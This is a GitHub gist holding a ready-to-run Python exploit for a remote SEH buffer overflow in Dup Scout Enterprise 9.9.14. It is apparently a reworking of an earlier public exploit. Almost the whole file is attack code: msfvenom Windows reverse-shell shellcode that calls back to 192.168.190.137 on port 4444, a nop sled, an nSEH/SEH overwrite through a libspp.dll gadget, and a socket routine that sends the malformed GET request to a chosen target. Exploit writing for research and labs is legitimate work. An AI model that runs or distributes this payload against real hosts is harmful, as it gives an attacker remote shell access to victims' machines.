Skip to content

Instantly share code, notes, and snippets.

@JasonTurley

JasonTurley/dupscout-exploit.py

Created June 17, 2022 19:45
Show Gist options
  • Save JasonTurley/deb82e4ea718c1884edb921e1f06ad09 to your computer and use it in GitHub Desktop.
Save JasonTurley/deb82e4ea718c1884edb921e1f06ad09 to your computer and use it in GitHub Desktop.
Download ZIP
Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)
Raw
dupscout-exploit.py
#!/usr/bin/env python3
# Dup Scout Enterprise v9.9.14 SEH Overflow
# This is my PoC for the previously discovered Dup Scout Enterprise SEH
# overflow vuln.
#
# The original exploit can be viewed here: https://www.exploit-db.com/exploits/42557
import socket
from struct import pack
import sys
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <IP_ADDRESS>")
sys.exit(1)
IP = sys.argv[1]
PORT = 8080
SIZE = 5000 # number of bytes to cause SEH overwrite
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.190.137
# LPORT=4444 -b "\x00\x09\x0a\x0d\x20" -f python -v shellcode
shellcode = b""
shellcode += b"\xbe\xde\xde\xed\x74\xdb\xcd\xd9\x74\x24\xf4"
shellcode += b"\x58\x33\xc9\xb1\x52\x83\xc0\x04\x31\x70\x0e"
shellcode += b"\x03\xae\xd0\x0f\x81\xb2\x05\x4d\x6a\x4a\xd6"
shellcode += b"\x32\xe2\xaf\xe7\x72\x90\xa4\x58\x43\xd2\xe8"
shellcode += b"\x54\x28\xb6\x18\xee\x5c\x1f\x2f\x47\xea\x79"
shellcode += b"\x1e\x58\x47\xb9\x01\xda\x9a\xee\xe1\xe3\x54"
shellcode += b"\xe3\xe0\x24\x88\x0e\xb0\xfd\xc6\xbd\x24\x89"
shellcode += b"\x93\x7d\xcf\xc1\x32\x06\x2c\x91\x35\x27\xe3"
shellcode += b"\xa9\x6f\xe7\x02\x7d\x04\xae\x1c\x62\x21\x78"
shellcode += b"\x97\x50\xdd\x7b\x71\xa9\x1e\xd7\xbc\x05\xed"
shellcode += b"\x29\xf9\xa2\x0e\x5c\xf3\xd0\xb3\x67\xc0\xab"
shellcode += b"\x6f\xed\xd2\x0c\xfb\x55\x3e\xac\x28\x03\xb5"
shellcode += b"\xa2\x85\x47\x91\xa6\x18\x8b\xaa\xd3\x91\x2a"
shellcode += b"\x7c\x52\xe1\x08\x58\x3e\xb1\x31\xf9\x9a\x14"
shellcode += b"\x4d\x19\x45\xc8\xeb\x52\x68\x1d\x86\x39\xe5"
shellcode += b"\xd2\xab\xc1\xf5\x7c\xbb\xb2\xc7\x23\x17\x5c"
shellcode += b"\x64\xab\xb1\x9b\x8b\x86\x06\x33\x72\x29\x77"
shellcode += b"\x1a\xb1\x7d\x27\x34\x10\xfe\xac\xc4\x9d\x2b"
shellcode += b"\x62\x94\x31\x84\xc3\x44\xf2\x74\xac\x8e\xfd"
shellcode += b"\xab\xcc\xb1\xd7\xc3\x67\x48\xb0\x2b\xdf\xec"
shellcode += b"\xc9\xc4\x22\x10\xdb\x48\xaa\xf6\xb1\x60\xfa"
shellcode += b"\xa1\x2d\x18\xa7\x39\xcf\xe5\x7d\x44\xcf\x6e"
shellcode += b"\x72\xb9\x9e\x86\xff\xa9\x77\x67\x4a\x93\xde"
shellcode += b"\x78\x60\xbb\xbd\xeb\xef\x3b\xcb\x17\xb8\x6c"
shellcode += b"\x9c\xe6\xb1\xf8\x30\x50\x68\x1e\xc9\x04\x53"
shellcode += b"\x9a\x16\xf5\x5a\x23\xda\x41\x79\x33\x22\x49"
shellcode += b"\xc5\x67\xfa\x1c\x93\xd1\xbc\xf6\x55\x8b\x16"
shellcode += b"\xa4\x3f\x5b\xee\x86\xff\x1d\xef\xc2\x89\xc1"
shellcode += b"\x5e\xbb\xcf\xfe\x6f\x2b\xd8\x87\x8d\xcb\x27"
shellcode += b"\x52\x16\xfb\x6d\xfe\x3f\x94\x2b\x6b\x02\xf9"
shellcode += b"\xcb\x46\x41\x04\x48\x62\x3a\xf3\x50\x07\x3f"
shellcode += b"\xbf\xd6\xf4\x4d\xd0\xb2\xfa\xe2\xd1\x96"
# Assemble payload
buf = b"\x90" * 20 # Place nop sled and shellcode at beginning of buffer since we run out of stack space
buf += shellcode
buf += b"A" * (2492 - len(buf)) # Overwrite SEH at 2496 bytes, sub 4 for nSEH
buf += b"\xEB\x06\x90\x90" # NSEH: jmp 0x06
buf += b"\xd0\x16\x15\x10" # SEH: 0x101516d0 libspp.dll - pop r32; pop r32; ret
buf += b"\xE9\x37\xBF\xFF\xFF" # jmp backwards into nop sled (jmp -0x40c4)
buf += b"D" * (SIZE - len(buf)) # padding to trigger crash
# Connect to the target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
# Send a malformed get request
packet = b"GET /../%s HTTP/1.1\r\n" % buf
packet += b"\r\n"
print("Sending packet of %d bytes" % len(buf))
s.send(packet)
s.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment